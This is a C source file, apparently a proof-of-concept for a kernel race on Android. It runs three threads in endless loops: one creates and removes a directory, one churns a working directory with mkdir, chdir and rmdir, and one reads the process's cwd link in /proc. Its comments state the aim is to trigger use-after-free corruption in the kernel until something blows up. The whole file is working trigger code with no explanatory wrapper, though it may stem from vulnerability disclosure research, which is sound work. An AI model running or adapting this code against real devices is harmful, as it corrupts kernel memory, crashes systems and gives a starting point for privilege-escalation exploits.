#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>

pid_t looper_pid;

void *uaf_worker(void *dummy) {
  time_t last_sec = 0;

  /*
  char real_cwd[1000];
  if (!getcwd(real_cwd, sizeof(real_cwd)))
    err(1, "getcwd");
  */

  /* This thread tries to trigger repeated UAFs until something blows up.
   * We should be triggering UAFs very quickly, but it probably takes
   * some time until one of them actually does something bad - the
   * UAF is happening in a specific slab type, and the most common type
   * of UAF that can happen here doesn't actually cause visible memory
   * corruption.
   */
  char cwd_path[100];
  sprintf(cwd_path, "/proc/self/task/%d/cwd", (int)looper_pid);
  while (1) {
    time_t cur_sec = time(NULL);
    if (cur_sec != last_sec) {
      last_sec = cur_sec;
      printf("uaf_worker: still alive (%d)\n", (int)cur_sec);
    }
    char symlink_target[1000];
    int len = readlink(cwd_path, symlink_target, sizeof(symlink_target)-1);
    if (len > 0) {
      symlink_target[len] = 0;
      if (1/*strcmp(symlink_target, "/mnt")*/) {
        printf("target: '%s'\n", symlink_target);
      }
    } else {
      printf("error\n");
    }
  }
}

void *chaos_worker(void *dummy) {
  rmdir("subdir");
  while (1) {
    if (mkdir("subdir", 0777))
      err(1, "mkdir");
    if (chdir("subdir"))
      err(1, "chdir");
    if (rmdir("../subdir"))
      err(1, "rmdir");
    if (chdir(".."))
      err(1, "chdir");
  }
}

int main(void) {
  printf("starting up...\n");
  looper_pid = syscall(__NR_gettid);

  pthread_t thread;
  if (pthread_create(&thread, NULL, uaf_worker, NULL))
    errx(1, "pthread_create failed");

  pthread_t thread2;
  if (pthread_create(&thread2, NULL, chaos_worker, NULL))
    errx(1, "pthread_create failed");

  /* this thread repeatedly updates current->fs without holding a lock */
  time_t last_sec = 0;
  char my_dir_name[100];
  sprintf(my_dir_name, "/sdcard/Android/data/org.connectbot/foobar");
  rmdir(my_dir_name);
  while (1) {
    time_t cur_sec = time(NULL);
    if (cur_sec != last_sec) {
      last_sec = cur_sec;
      printf("looper: still alive (%d)\n", (int)cur_sec);
    }
    if (mkdir(my_dir_name, 0777))
      err(1, "looper: mkdir");
    if (rmdir(my_dir_name))
      err(1, "looper: rmdir");
  }
}